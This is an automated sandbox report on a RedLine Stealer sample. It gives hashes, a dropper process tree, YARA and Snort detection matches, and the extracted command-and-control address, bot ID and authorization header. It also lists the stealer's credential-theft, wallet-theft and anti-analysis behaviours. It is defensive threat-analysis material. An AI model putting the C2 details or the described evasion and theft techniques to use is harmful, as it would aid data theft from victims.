
Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 816370
MD5: 0c8e10cf6146a0f67d5e4f784c251ffe
SHA1: ec1922422ad71e92c53acbe0db7f27161fc8a426
SHA256: f4e5103746728e49e2aad05ffc1f61d58a9f61071a822642779d5980d001e54f
Tags: exe

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Disable Windows Defender notifications (registry)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5956 cmdline: C:\Users\user\Desktop\file.exe MD5: 0C8E10CF6146A0F67D5E4F784C251FFE)
    • pluT14Nj54.exe (PID: 3600 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe MD5: D16ACC7C93BF0ECC8BE14CAE8BE1F15A)
      • plct23La85.exe (PID: 4552 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe MD5: A19D601A69B407CED85F6C6E721D0E2C)
        • plvy67MJ29.exe (PID: 5192 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe MD5: C55924DDF020D2D574D1FF1BDF1446FC)
          • buze36rj14.exe (PID: 3472 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe MD5: 23F943F98B2EEF1D8427BA90111C34E2)
          • caQi43qE17.exe (PID: 4632 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe MD5: 93E470CB72A45CE819FF3EDB9B4A51B3)
  • rundll32.exe (PID: 4280 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 4908 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 3624 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 3268 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware configuration (RedLine): {"C2 url": "193.233.20.24:4123", "Bot Id": "dunkan", "Authorization Header": "505c396c57c6287fc3fdc5f3aeab0819"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author
C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1a430:$pat14: , CommandLine:
  • 0x1349d:$v2_1: ListOfProcesses
  • 0x1327c:$v4_3: base64str
  • 0x13dfb:$v4_4: stringKey
  • 0x11b63:$v4_5: BytesToStringConverted
  • 0x10d76:$v4_6: FromBase64
  • 0x12098:$v4_8: procName
  • 0x1280f:$v5_5: FileScanning
  • 0x11d6c:$v5_7: RecordHeaderField
  • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT

Source | Rule | Description | Author
0000000A.00000003.300274214.00000000006D0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x2d6b6:$pat14: , CommandLine:
  • 0x1f7a9:$v2_1: ListOfProcesses
  • 0x1decf:$v4_3: base64str
  • 0x1de8e:$v4_4: stringKey
  • 0x1ded9:$v4_5: BytesToStringConverted
  • 0x1dec4:$v4_6: FromBase64
  • 0x1f464:$v4_8: procName
  • 0x1cbb6:$v5_5: FileScanning
  • 0x1cdd4:$v5_7: RecordHeaderField
  • 0x1cd06:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0000000A.00000002.363557485.00000000008D6000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x16b0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
(11 further entries not shown)

Source | Rule | Description | Author
10.2.caQi43qE17.exe.4a80ee8.5.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
10.2.caQi43qE17.exe.4a80ee8.5.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x2a9ce:$pat14: , CommandLine:
  • 0x1cac1:$v2_1: ListOfProcesses
  • 0x1b1e7:$v4_3: base64str
  • 0x1b1a6:$v4_4: stringKey
  • 0x1b1f1:$v4_5: BytesToStringConverted
  • 0x1b1dc:$v4_6: FromBase64
  • 0x1c77c:$v4_8: procName
  • 0x19ece:$v5_5: FileScanning
  • 0x1a0ec:$v5_7: RecordHeaderField
  • 0x1a01e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
10.2.caQi43qE17.exe.7e6cce.2.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
10.2.caQi43qE17.exe.7e6cce.2.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x2b8b6:$pat14: , CommandLine:
  • 0x1d9a9:$v2_1: ListOfProcesses
  • 0x1c0cf:$v4_3: base64str
  • 0x1c08e:$v4_4: stringKey
  • 0x1c0d9:$v4_5: BytesToStringConverted
  • 0x1c0c4:$v4_6: FromBase64
  • 0x1d664:$v4_8: procName
  • 0x1adb6:$v5_5: FileScanning
  • 0x1afd4:$v5_7: RecordHeaderField
  • 0x1af06:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
10.2.caQi43qE17.exe.4b50000.6.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
(30 further entries not shown)

No Sigma rule has matched

Timestamp: 02/27/23-21:18:20.122346
SID: 2043233
Source IP: 192.168.2.3
Destination IP: 193.233.20.24
Source Port: 49699
Destination Port: 4123
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 02/27/23-21:18:21.439552
SID: 2043234
Source IP: 193.233.20.24
Destination IP: 192.168.2.3
Source Port: 4123
Destination Port: 49699
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 02/27/23-21:18:31.861096
SID: 2043231
Source IP: 192.168.2.3
Destination IP: 193.233.20.24
Source Port: 49699
Destination Port: 4123
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe | Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: file.exe | ReversingLabs: Detection: 64%
Source: file.exe | Virustotal: Detection: 54%
Source: file.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe | ReversingLabs: Detection: 74%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe | Virustotal: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | ReversingLabs: Detection: 53%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | Virustotal: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fuYn3946BI92.exe | ReversingLabs: Detection: 25%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fuYn3946BI92.exe | Virustotal: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | ReversingLabs: Detection: 53%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\diIN97YY43.exe | ReversingLabs: Detection: 25%
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\diIN97YY43.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fuYn3946BI92.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | Joe Sandbox ML: detected
Source: 3.3.plvy67MJ29.exe.4fa6d7e.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.3.plct23La85.exe.4e6a220.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.3.pluT14Nj54.exe.47fe420.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 00000000.00000003.256542191.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: RedLine {"C2 url": "193.233.20.24:4123", "Bot Id": "dunkan", "Authorization Header": "505c396c57c6287fc3fdc5f3aeab0819"}
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00172F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00172F1D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | Code function: 1_2_00392F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00392F1D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | Code function: 2_2_00132F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_00132F1D
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | Code function: 3_2_00FD2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,3_2_00FD2F1D

Compliance

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Unpacked PE file: 10.2.caQi43qE17.exe.400000.0.unpack
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: wextract.pdb | source: file.exe, pluT14Nj54.exe.0.dr, plvy67MJ29.exe.2.dr, plct23La85.exe.1.dr
Source: Binary string: wextract.pdbGCTL | source: file.exe, pluT14Nj54.exe.0.dr, plvy67MJ29.exe.2.dr, plct23La85.exe.1.dr
Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb | source: plvy67MJ29.exe, 00000003.00000003.259906180.0000000004FA4000.00000004.00000020.00020000.00000000.sdmp, buze36rj14.exe, 00000004.00000000.260096763.0000000000902000.00000002.00000001.01000000.00000007.sdmp, buze36rj14.exe.3.dr
Source: Binary string: _.pdb | source: caQi43qE17.exe, 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.363309849.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000003.303183570.0000000000941000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00172390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00172390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | Code function: 1_2_00392390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00392390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | Code function: 2_2_00132390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00132390
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | Code function: 3_2_00FD2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_00FD2390
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 10_2_0246EC20

Networking

Source: Traffic | Snort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49699 -> 193.233.20.24:4123
Source: Traffic | Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49699 -> 193.233.20.24:4123
Source: Traffic | Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.24:4123 -> 192.168.2.3:49699
Source: Malware configuration extractor | URLs: 193.233.20.24:4123
Source: Joe Sandbox View | ASN Name: REDCOM-ASRedcomKhabarovskRussiaRU
Source: Joe Sandbox View | IP Address: 193.233.20.24
Source: global traffic | TCP traffic: 192.168.2.3:49699 -> 193.233.20.24:4123
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
